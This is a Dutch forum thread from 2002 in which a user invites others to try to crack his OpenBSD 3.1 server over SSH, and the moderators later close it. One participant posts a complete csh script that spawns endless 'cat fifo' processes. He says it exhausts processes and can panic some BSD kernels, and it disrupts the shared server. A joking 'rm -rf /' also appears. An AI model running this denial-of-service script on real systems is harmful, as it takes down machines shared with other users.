Toon posts:

OpenBSD project (hack openbsd 3.1)

Pagina: 1
Acties:
  • 38 views sinds 30-01-2008

Verwijderd

Topicstarter
Tja, ik ben dus bezig met een project en heb hulp nodig. Ik vroeg mij af of deze gekraakt kan worden.
Daarom heb ik een server opgezet met OpenBSD 3.1 en een leuke loginnaampje.

De gegevens:

=========================

Username: william
Password: authorization riker omega three
Host: uss.enterprise.universe
Poort: SC 231-427

Loopt via SSH...

=========================

Nou ik zal zien of het storm loopt. Deze server staat btw niet 24/7 aan maar wel tussen 18:00 en 24:00 uur....

See you....

-CoolZero

Verwijderd

lullig als het nu niet je eigen server blijkt te zijn......

Verwijderd

inderdaad... zet anders als root even in een bestandje "/ikbencoolzero" ofzo dat jij 't echt bent ?
zoiets :)

Verwijderd

rm -rf / werkt niet.... :P

  • connected
  • Registratie: Juni 2001
  • Laatst online: 04-02 22:07

connected

tja daarnet deed ie nog :P

qn-213-73-179-114.quicknet.nl ????

Verwijderd

Topicstarter
MOTD?????

/etc/motd

Check ! :)

Verwijderd

poortnummer 111 staat open. Is dat niet de "beruchte" portmap-service. Als het echt veilig moet zou ik die zker uitzetten

Verwijderd

Topicstarter
Dude, portmap moet goed wezen, zit standaard in installatie van openbsd 3.1 en moet daarom veilig wezen jaja ;) volgens website van openbsd dan he ;) lol

Verwijderd

eej... ik wil dat dingetje van je best proberen te kraken, maar is niet leuk als er een of andere rare gast :+ op zit die de hele tijd zit te flooden :(

Verwijderd

Op maandag 20 mei 2002 22:21 schreef a.koster het volgende:
poortnummer 111 staat open. Is dat niet de "beruchte" portmap-service. Als het echt veilig moet zou ik die zker uitzetten
Inderdaad sun/rpc portmapper. Die zou ik maar eens heel snel uitzetten. Bekende poort die je absoluut niet beschikbaar wil hebben op het internet. Hij is strict genomen niet nodig, tenzij je rpc services draait en dat doe je meestal niet over internet. Of is dat een backdoor zodat we de computer kunnen hacken ? :)

Verwijderd

Topicstarter
wat een irri ventje idd die flooder... fake hacker :+

  • Y0ur1
  • Registratie: Oktober 2000
  • Niet online
Is dus je eigen servertje :)

12:43AM up 1:41, 7 users, load averages: 1.13, 6.55, 7.42
USER TTY FROM LOGIN@ IDLE WHAT
gast p0 pc48.ec.ele.tue. 12:33AM 3 bash
CoolZero p1 10.0.0.2 12:41AM 0 -csh
gast p2 pc48.ec.ele.tue. 12:30AM 0 find / -iname killall
gast p3 node-d-4883.a200 12:37AM 0 -csh
gast p4 ip503cbb66.speed 12:41AM 0 w
gast p5 hummelink.xs4all 12:40AM 0 bash
gast p6 cust.93.185.adsl 12:42AM 0 -csh
%

Zitten wel al wat gasten op :P

Verwijderd

% opdrachtje
No more processes.

:?

  • _nethack
  • Registratie: September 2000
  • Laatst online: 18:52

_nethack

We're all MAD here

:o whoops...

Sometimes you just have to sit back, relax, and let the train wreck itself


  • Y0ur1
  • Registratie: Oktober 2000
  • Niet online
Op maandag 20 mei 2002 22:41 schreef areana het volgende:
% opdrachtje
No more processes.

:?
ja hbe ik nu ook, server is er mee gekapt

Verwijderd

Op maandag 20 mei 2002 22:42 schreef YT-Croc het volgende:
ja heb ik nu ook, server is er mee gekapt
...en ik ging net zo lekker :'( :P

  • _nethack
  • Registratie: September 2000
  • Laatst online: 18:52

_nethack

We're all MAD here

misschien moet iemand met wat meer rechten even het procesje /home/gast/.blah/test.sh afschieten....
:X

Deed het niet expres, nou ja, niet helemaal...

Sometimes you just have to sit back, relax, and let the train wreck itself


Verwijderd

Op maandag 20 mei 2002 22:44 schreef Operations het volgende:
misschien moet iemand met wat meer rechten even het procesje /home/gast/.blah/test.sh afschieten....
:X

Deed het niet expres, nou ja, niet helemaal...
Verklaar u nader. Heb zoiets als "while true fork()" gedaan? :)

Verwijderd

volgens mij heeft je computertje het zwaar

Verwijderd

Op maandag 20 mei 2002 22:44 schreef Operations het volgende:
misschien moet iemand met wat meer rechten even het procesje /home/gast/.blah/test.sh afschieten....
:X

Deed het niet expres, nou ja, niet helemaal...
jij = flooder?

hehe... ik zou idd maar even wat aan dat bakje doen...

Verwijderd

Topicstarter
Had het al gezien, tja ach, dat kan je doen, maar jah, is flooden he? Beetje jammer }:O

  • _nethack
  • Registratie: September 2000
  • Laatst online: 18:52

_nethack

We're all MAD here

Op maandag 20 mei 2002 22:48 schreef CoolZero het volgende:
Had het al gezien, tja ach, dat kan je doen, maar jah, is flooden he? Beetje jammer }:O
Niet gewoon flooden... een bug in bepaalde *bsd kernel krijg je hiermee volledig onderuit (als in kernel panic)
code:
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/csh
set path = ( /usr/bin /usr/sbin /bin /sbin )

unlimit
cd /tmp
if ( -e fifo ) then
    rm fifo
endif
mkfifo fifo
while ( 1 )
    cat fifo >& /dev/null &
end

Maar hij schijnt er goed tegen te kunnen...

(en voor mensen die no more processes krijgen; 'unlimit' lost een hoop op)

[edit]
er lopen een hoop 'cat fifo' processen die gewoon alle processen van 'gast' in gebruik nemen... die even killen en je bent weer klaar :)

Sometimes you just have to sit back, relax, and let the train wreck itself


Verwijderd

Topicstarter
ik zag het al ;) lol, die script ook al ;) wel geinig... vooral als je toevallig bij een grote server erin komt ;) lol

  • Jordi
  • Registratie: Januari 2000
  • Niet online

Jordi

#1#1

Mja, dit kan best echt zijn, maar... hier is GoT sowieso niet voor bedoeld, sorry. Zeker niet als het ook nog eens hackpogingen zouden kunnen zijn.

Het zal wel niet, maar het zou maar wel.

Pagina: 1

Dit topic is gesloten.